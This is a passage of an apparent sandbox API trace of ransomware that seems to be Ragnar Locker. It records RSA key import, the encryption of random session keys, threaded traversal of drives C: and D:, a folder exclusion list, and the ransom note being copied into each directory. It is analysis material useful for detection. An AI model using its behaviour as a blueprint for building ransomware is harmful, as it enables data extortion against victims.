KEY-----\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAw005kESVyxNWg2h19zL/\ne59YzmvuEZ6uVlvgGRNetNnJR7SKiNBsesbAq3hh+S4EnSxHg+qJPuCPR/Rw6jdM\ncFBkDF+mJN7/xktTy8QVnxDiz8hhhQl/0GJYVhvIGmM5cB8ta+RovnL0EArXAtfi\nWQItYorHGse44WAGWP5EpcjLXj5CBgSvk0gfpqYq5BUfbhbYCmXJJwrdph4z6y3J\n3RgkadGCA5w5bw96snaCQH+nGyhx1V9rEwH5g7Kgcay3vMT5R2SXCbPaI54xB+jn\n4pw6AuVm0I4CAKA+aTz4lU7U9ntP/on4oRLu7mzUbZ8jr+F/TFmuKUc9DmNHeVFb\nCwIDAQAB\n-----END PUBLIC KEY-----\n", cchString=0x0, dwFlags=0x0, pbBinary=0x3592ea8, pcbBinary=0x5afd588, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x3592ea8, pcbBinary=0x5afd588, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0163.554] GetProcessHeap () returned 0x3520000 [0163.554] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592b18 | out: hHeap=0x3520000) returned 1 [0163.554] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x3592ea8, cbEncoded=0x126, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x5afd584, pcbStructInfo=0x5afd57c | out: pvStructInfo=0x5afd584, pcbStructInfo=0x5afd57c) returned 1 [0163.567] CryptImportPublicKeyInfo (in: hCryptProv=0x35563b8, dwCertEncodingType=0x1, pInfo=0x3592b18*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3592b48*, PublicKey.cbData=0x10e, PublicKey.pbData=0x3592b50*, PublicKey.cUnusedBits=0x0), phKey=0x357e34c | out: phKey=0x357e34c*=0x3548400) returned 1 [0163.887] GetProcessHeap () returned 0x3520000 [0163.887] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x3592ea8 | out: hHeap=0x3520000) returned 1 [0163.887] LocalFree (hMem=0x3592b18) returned 0x0 [0163.887] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd584*=0x3556990) returned 1 [0163.893] CryptGenRandom (in: hProv=0x3556990, dwLen=0x28, pbBuffer=0x35dbee4 | out: pbBuffer=0x35dbee4) returned 1 [0163.893] CryptReleaseContext (hProv=0x3556990, dwFlags=0x0) returned 1 [0163.893] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd584*=0x0) returned 1 [0164.879] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd580*=0x3556b28) returned 1 [0164.885] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x40, pbBuffer=0x5afd540 | out: pbBuffer=0x5afd540) returned 1 [0164.885] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0164.885] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd580*=0x0) returned 0 [0164.919] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd57c*=0x3556bb0) returned 1 [0164.925] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x20, pbBuffer=0x35dbf0c | out: pbBuffer=0x35dbf0c) returned 1 [0164.925] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0164.925] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd57c*=0x0) returned 0 [0165.112] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd578*=0x3557188) returned 1 [0165.117] CryptGenRandom (in: hProv=0x3557188, dwLen=0x40, pbBuffer=0x5afd538 | out: pbBuffer=0x5afd538) returned 1 [0165.117] CryptReleaseContext (hProv=0x3557188, dwFlags=0x0) returned 1 [0165.117] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd578*=0x0) returned 0 [0165.130] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35dbf2c*, pdwDataLen=0x5afe288*=0x28, dwBufLen=0x190 | out: pbData=0x35dbf2c*, pdwDataLen=0x5afe288*=0x100) returned 1 [0165.131] GetLastError () returned 0x80090016 [0165.131] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35dc02c*, pdwDataLen=0x5afe288*=0x20, dwBufLen=0x140 | out: pbData=0x35dc02c*, pdwDataLen=0x5afe288*=0x100) returned 1 [0165.131] GetLastError () returned 0x80090016 [0165.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x35cefc0, dwCreationFlags=0x0, lpThreadId=0x5afdcc8 | out: lpThreadId=0x5afdcc8*=0xd0c) returned 0x38c [0165.133] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd584*=0x35564c8) returned 1 [0165.138] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x28, pbBuffer=0x35e905c | out: pbBuffer=0x35e905c) returned 1 [0165.138] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0165.138] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd584*=0x0) returned 0 [0166.164] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd580*=0x3556bb0) returned 1 [0166.173] CryptGenRandom (in: hProv=0x3556bb0, dwLen=0x40, pbBuffer=0x5afd540 | out: pbBuffer=0x5afd540) returned 1 [0166.173] CryptReleaseContext (hProv=0x3556bb0, dwFlags=0x0) returned 1 [0166.173] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd580*=0x0) returned 0 [0166.423] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd57c*=0x3556dd0) returned 1 [0166.424] CryptGenRandom (in: hProv=0x3556dd0, dwLen=0x20, pbBuffer=0x35e9084 | out: pbBuffer=0x35e9084) returned 1 [0166.424] CryptReleaseContext (hProv=0x3556dd0, dwFlags=0x0) returned 1 [0166.424] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd57c*=0x0) returned 0 [0166.426] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd578*=0x3556cc0) returned 1 [0166.427] CryptGenRandom (in: hProv=0x3556cc0, dwLen=0x40, pbBuffer=0x5afd538 | out: pbBuffer=0x5afd538) returned 1 [0166.427] CryptReleaseContext (hProv=0x3556cc0, dwFlags=0x0) returned 1 [0166.427] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd578*=0x0) returned 0 [0166.430] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35e90a4*, pdwDataLen=0x5afe288*=0x28, dwBufLen=0x190 | out: pbData=0x35e90a4*, pdwDataLen=0x5afe288*=0x100) returned 1 [0166.430] GetLastError () returned 0x80090016 [0166.430] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35e91a4*, pdwDataLen=0x5afe288*=0x20, dwBufLen=0x140 | out: pbData=0x35e91a4*, pdwDataLen=0x5afe288*=0x100) returned 1 [0166.431] GetLastError () returned 0x80090016 [0166.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x35dc138, dwCreationFlags=0x0, lpThreadId=0x5afdccc | out: lpThreadId=0x5afdccc*=0x79c) returned 0x3e0 [0166.431] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd584*=0x3556b28) returned 1 [0166.432] CryptGenRandom (in: hProv=0x3556b28, dwLen=0x28, pbBuffer=0x35f61d4 | out: pbBuffer=0x35f61d4) returned 1 [0166.432] CryptReleaseContext (hProv=0x3556b28, dwFlags=0x0) returned 1 [0166.432] CryptAcquireContextW (in: phProv=0x5afd584, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd584*=0x0) returned 0 [0166.434] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd580*=0x35565d8) returned 1 [0166.435] CryptGenRandom (in: hProv=0x35565d8, dwLen=0x40, pbBuffer=0x5afd540 | out: pbBuffer=0x5afd540) returned 1 [0166.435] CryptReleaseContext (hProv=0x35565d8, dwFlags=0x0) returned 1 [0166.435] CryptAcquireContextW (in: phProv=0x5afd580, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd580*=0x0) returned 0 [0166.437] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd57c*=0x3556cc0) returned 1 [0166.438] CryptGenRandom (in: hProv=0x3556cc0, dwLen=0x20, pbBuffer=0x35f61fc | out: pbBuffer=0x35f61fc) returned 1 [0166.438] CryptReleaseContext (hProv=0x3556cc0, dwFlags=0x0) returned 1 [0166.438] CryptAcquireContextW (in: phProv=0x5afd57c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd57c*=0x0) returned 0 [0166.441] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0x5afd578*=0x35564c8) returned 1 [0166.441] CryptGenRandom (in: hProv=0x35564c8, dwLen=0x40, pbBuffer=0x5afd538 | out: pbBuffer=0x5afd538) returned 1 [0166.441] CryptReleaseContext (hProv=0x35564c8, dwFlags=0x0) returned 1 [0166.441] CryptAcquireContextW (in: phProv=0x5afd578, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x5afd578*=0x0) returned 0 [0166.444] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f621c*, pdwDataLen=0x5afe288*=0x28, dwBufLen=0x190 | out: pbData=0x35f621c*, pdwDataLen=0x5afe288*=0x100) returned 1 [0166.444] GetLastError () returned 0x80090016 [0166.444] CryptEncrypt (in: hKey=0x3548400, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x35f631c*, pdwDataLen=0x5afe288*=0x20, dwBufLen=0x140 | out: pbData=0x35f631c*, pdwDataLen=0x5afe288*=0x100) returned 1 [0166.444] GetLastError () returned 0x80090016 [0166.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xec1af0, lpParameter=0x35e92b0, dwCreationFlags=0x0, lpThreadId=0x5afdcd0 | out: lpThreadId=0x5afdcd0*=0xd84) returned 0x3ec [0166.445] WaitForMultipleObjects (nCount=0x3, lpHandles=0x5afe018*=0x38c, bWaitAll=1, dwMilliseconds=0xffffffff) returned 0x0 [0169.758] GetProcessHeap () returned 0x3520000 [0169.758] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x357e348 | out: hHeap=0x3520000) returned 1 [0169.758] CloseHandle (hObject=0x38c) returned 1 [0169.758] GetProcessHeap () returned 0x3520000 [0169.759] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35cefc0 | out: hHeap=0x3520000) returned 1 [0169.759] CloseHandle (hObject=0x3e0) returned 1 [0169.759] GetProcessHeap () returned 0x3520000 [0169.759] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35dc138 | out: hHeap=0x3520000) returned 1 [0169.762] CloseHandle (hObject=0x3ec) returned 1 [0169.762] GetProcessHeap () returned 0x3520000 [0169.762] HeapFree (in: hHeap=0x3520000, dwFlags=0x0, lpMem=0x35e92b0 | out: hHeap=0x3520000) returned 1 [0169.763] FindClose (in: hFindFile=0x3548a40 | out: hFindFile=0x3548a40) returned 1 [0169.765] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0x80a0471e, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x80a0471e, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 0 [0169.765] FindClose (in: hFindFile=0x3548980 | out: hFindFile=0x3548980) returned 1 [0169.767] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\Recovery\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0x3548980 [0169.767] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0xedc97796, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedc97796, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0169.769] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xedc97796, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedc97796, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xed67b2c2, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x10fe, dwReserved0=0x0, dwReserved1=0x0, cFileName="!$R4GN4R_B8CF767A$!.txt", cAlternateFileName="")) returned 1 [0169.769] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\Recovery\\*.*", nBufferLength=0x104, lpBuffer=0x5afe6c0, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\Recovery\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x13 [0169.769] lstrcpyW (in: lpString1=0x5afe6e0, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0169.769] PathFindExtensionW (pszPath="\\\\?\\D:\\Recovery\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0169.769] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0169.769] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0xf26b9eef, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf26b9eef, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 1 [0169.769] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5afead4 | out: lpFindFileData=0x5afead4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0xf26b9eef, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xf26b9eef, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="WindowsRE", cAlternateFileName="")) returned 0 [0169.769] FindClose (in: hFindFile=0x3548980 | out: hFindFile=0x3548980) returned 1 [0169.770] FindNextFileW (in: hFindFile=0x35483c0, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0169.770] lstrcmpiW (lpString1="System Volume Information", lpString2=".") returned 1 [0169.770] lstrcmpiW (lpString1="System Volume Information", lpString2="..") returned 1 [0169.770] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\*.*", nBufferLength=0x104, lpBuffer=0x5aff5d8, lpFilePart=0x5affc98 | out: lpBuffer="\\\\?\\D:\\*.*", lpFilePart=0x5affc98*="*.*") returned 0xa [0169.770] lstrcpyW (in: lpString1=0x5aff5e6, lpString2="System Volume Information" | out: lpString1="System Volume Information") returned="System Volume Information" [0169.771] lstrcatW (in: lpString1="\\\\?\\D:\\System Volume Information", lpString2="\\" | out: lpString1="\\\\?\\D:\\System Volume Information\\") returned="\\\\?\\D:\\System Volume Information\\" [0169.771] lstrcpyW (in: lpString1=0x5aff3cc, lpString2="\\\\?\\D:\\System Volume Information\\" | out: lpString1="\\\\?\\D:\\System Volume Information\\") returned="\\\\?\\D:\\System Volume Information\\" [0169.771] lstrcatW (in: lpString1="\\\\?\\D:\\System Volume Information\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\D:\\System Volume Information\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\D:\\System Volume Information\\!$R4GN4R_B8CF767A$!.txt" [0169.771] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: "c:\\users\\public\\documents\\!$r4gn4r_b8cf767a$!.txt"), lpNewFileName="\\\\?\\D:\\System Volume Information\\!$R4GN4R_B8CF767A$!.txt" (normalized: "d:\\system volume information\\!$r4gn4r_b8cf767a$!.txt"), bFailIfExists=1) returned 0 [0169.772] lstrcatW (in: lpString1="\\\\?\\D:\\System Volume Information\\", lpString2="*.*" | out: lpString1="\\\\?\\D:\\System Volume Information\\*.*") returned="\\\\?\\D:\\System Volume Information\\*.*" [0169.772] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\System Volume Information\\*.*", nBufferLength=0x104, lpBuffer=0x5afe4b8, lpFilePart=0x5afef8c | out: lpBuffer="\\\\?\\D:\\System Volume Information\\*.*", lpFilePart=0x5afef8c*="*.*") returned 0x24 [0169.773] lstrcpyW (in: lpString1=0x5afe2b0, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.773] lstrcpyW (in: lpString1=0x5afe4fa, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0169.773] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\System Volume Information\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0xffffffff [0169.773] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0169.773] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\System Volume Information\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5afead4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5afead4) returned 0xffffffff [0169.773] FindNextFileW (in: hFindFile=0x35483c0, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 0 [0169.773] FindClose (in: hFindFile=0x35483c0 | out: hFindFile=0x35483c0) returned 1 [0169.775] FindFirstFileExW (in: lpFileName="\\\\?\\D:\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5aff7e0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5aff7e0) returned 0x3548980 [0169.776] GetFullPathNameW (in: lpFileName="\\\\?\\D:\\*.*", nBufferLength=0x104, lpBuffer=0x5aff3cc, lpFilePart=0x5affc98 | out: lpBuffer="\\\\?\\D:\\*.*", lpFilePart=0x5affc98*="*.*") returned 0xa [0169.776] lstrcpyW (in: lpString1=0x5aff3da, lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="!$R4GN4R_B8CF767A$!.txt") returned="!$R4GN4R_B8CF767A$!.txt" [0169.776] PathFindExtensionW (pszPath="\\\\?\\D:\\!$R4GN4R_B8CF767A$!.txt") returned=".txt" [0169.776] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="!$R4GN4R_B8CF767A$!.txt") returned 0 [0169.776] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0xbebd2844, ftCreationTime.dwHighDateTime=0x1d66669, ftLastAccessTime.dwLowDateTime=0xedb34b38, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedb34b38, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$RECYCLE.BIN", cAlternateFileName="")) returned 1 [0169.778] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x1e3d62eb, ftCreationTime.dwHighDateTime=0x1d32795, ftLastAccessTime.dwLowDateTime=0xedc97796, ftLastAccessTime.dwHighDateTime=0x1d66669, ftLastWriteTime.dwLowDateTime=0xedc97796, ftLastWriteTime.dwHighDateTime=0x1d66669, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recovery", cAlternateFileName="")) returned 1 [0169.778] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 1 [0169.778] FindNextFileW (in: hFindFile=0x3548980, lpFindFileData=0x5aff7e0 | out: lpFindFileData=0x5aff7e0*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x8983e192, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x899e1d51, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x899e1d51, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System Volume Information", cAlternateFileName="")) returned 0 [0169.778] FindClose (in: hFindFile=0x3548980 | out: hFindFile=0x3548980) returned 1 Thread: id = 169 os_tid = 0x550 Thread: id = 171 os_tid = 0x7f0 [0164.940] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\*.*", nBufferLength=0x104, lpBuffer=0x5cff27c, lpFilePart=0x5cffd50 | out: lpBuffer="\\\\?\\C:\\*.*", lpFilePart=0x5cffd50*="*.*") returned 0xa [0164.940] lstrcpyW (in: lpString1=0x5cff074, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0164.940] lstrcpyW (in: lpString1=0x5cff28a, lpString2="*.*" | out: lpString1="*.*") returned="*.*" [0164.940] FindFirstFileExW (in: lpFileName="\\\\?\\C:\\*.*", fInfoLevelId=0x1, lpFindFileData=0x5cff898, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x5cff898) returned 0x3548080 [0164.941] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2=".") returned -1 [0164.941] lstrcmpiW (lpString1="!$R4GN4R_B8CF767A$!.txt", lpString2="..") returned -1 [0164.941] FindNextFileW (in: hFindFile=0x3548080, lpFindFileData=0x5cff898 | out: lpFindFileData=0x5cff898*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0xf0b4f277, ftCreationTime.dwHighDateTime=0x1d32736, ftLastAccessTime.dwLowDateTime=0x9b28dcfd, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x9b28dcfd, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="$GetCurrent", cAlternateFileName="")) returned 1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2=".") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="..") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Windows") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Windows.old") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Tor browser") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Internet Explorer") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Google") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Opera") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Opera Software") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Mozilla") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="Mozilla Firefox") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="$Recycle.Bin") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="ProgramData") returned -1 [0164.945] lstrcmpiW (lpString1="$GetCurrent", lpString2="All Users") returned -1 [0164.945] GetFullPathNameW (in: lpFileName="\\\\?\\C:\\*.*", nBufferLength=0x104, lpBuffer=0x5cff690, lpFilePart=0x5cffd50 | out: lpBuffer="\\\\?\\C:\\*.*", lpFilePart=0x5cffd50*="*.*") returned 0xa [0164.945] lstrcpyW (in: lpString1=0x5cff69e, lpString2="$GetCurrent" | out: lpString1="$GetCurrent") returned="$GetCurrent" [0164.945] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent", lpString2="\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\") returned="\\\\?\\C:\\$GetCurrent\\" [0164.946] lstrcpyW (in: lpString1=0x5cff484, lpString2="\\\\?\\C:\\$GetCurrent\\" | out: lpString1="\\\\?\\C:\\$GetCurrent\\") returned="\\\\?\\C:\\$GetCurrent\\" [0164.946] lstrcatW (in: lpString1="\\\\?\\C:\\$GetCurrent\\", lpString2="!$R4GN4R_B8CF767A$!.txt" | out: lpString1="\\\\?\\C:\\$GetCurrent\\!$R4GN4R_B8CF767A$!.txt") returned="\\\\?\\C:\\$GetCurrent\\!$R4GN4R_B8CF767A$!.txt" [0164.946] CopyFileW (lpExistingFileName="C:\\Users\\Public\\Documents\\!$R4GN4R_B8CF767A$!.txt" (normalized: 